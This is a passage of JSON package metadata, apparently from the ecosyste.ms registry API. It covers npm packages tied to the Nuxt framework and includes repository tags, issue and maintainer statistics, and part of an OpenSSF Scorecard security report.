itHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-05-11T01:23:00.838Z","dependent_packages_count":0,"downloads":14950,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.740682484370218,"dependent_packages_count":37.37762528552416,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.55915388494719},"purl":"pkg:npm/%40nuxt/rspack-builder-nightly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/rspack-builder-nightly","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/rspack-builder-nightly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/rspack-builder-nightly/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-07T01:14:02.186Z","issues_count":6017,"pull_requests_count":6878,"avg_time_to_close_issue":11682718.831972789,"avg_time_to_close_pull_request":788508.7928300017,"issues_closed_count":4405,"pull_requests_closed_count":6053,"pull_request_authors_count":594,"issue_authors_count":3408,"avg_comments_per_issue":4.155559248795081,"avg_comments_per_pull_request":2.497092177958709,"merged_pull_requests_count":5387,"bot_issues_count":12,"bot_pull_requests_count":2976,"past_year_issues_count":540,"past_year_pull_requests_count":737,"past_year_avg_time_to_close_issue":624768.3,"past_year_avg_time_to_close_pull_request":248155.8594059406,"past_year_issues_closed_count":280,"past_year_pull_requests_closed_count":505,"past_year_pull_request_authors_count":98,"past_year_issue_authors_count":420,"past_year_avg_comments_per_issue":2.227777777777778,"past_year_avg_comments_per_pull_request":3.0881953867028495,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":250,"past_year_merged_pull_requests_count":440,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1325,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"Flo0806","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Flo0806"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"}],"active_maintainers":[{"login":"danielroe","count":158,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"huang-julien","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Mini-ghost","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Flo0806","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Flo0806"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder-nightly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder-nightly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder-nightly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder-nightly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder-nightly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder-nightly/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2024-09-24T15:10:10.824Z","updated_at":"2024-09-24T15:10:10.824Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11242055,"name":"@lgcardenas/nuxt","ecosystem":"npm","description":"\u003cp align=\"center\"\u003e\u003cimg alt=\"Nuxt\" align=\"center\" src=\"./.github/logo.svg\"/\u003e\u003c/p\u003e\u003cbr/\u003e \u003cp align=\"center\"\u003e   \u003ca href=\"https://github.com/nuxt/nuxt.js/actions?query=branch%3Adev+event%3Apush\"\u003e\u003cimg src=\"https://github.com/nuxt/nuxt.js/workflows/test/badge.svg?","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"lgcardenas","versions_count":2,"first_release_published_at":"2025-01-06T22:06:44.920Z","latest_release_published_at":"2025-01-09T04:09:56.115Z","latest_release_number":"2.18.3-beta","last_synced_at":"2026-05-11T01:23:05.938Z","created_at":"2025-01-06T22:52:53.868Z","updated_at":"2026-05-11T01:23:05.938Z","registry_url":"https://www.npmjs.com/package/@lgcardenas/nuxt","install_command":"npm install @lgcardenas/nuxt","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"beta":"2.18.2-beta","latest":"2.18.3-beta"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-24T15:11:02.000Z","size":136837,"stargazers_count":60120,"open_issues_count":949,"forks_count":5591,"subscribers_count":777,"default_branch":"main","last_synced_at":"2026-04-24T20:04:41.708Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-24T18:27:37.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 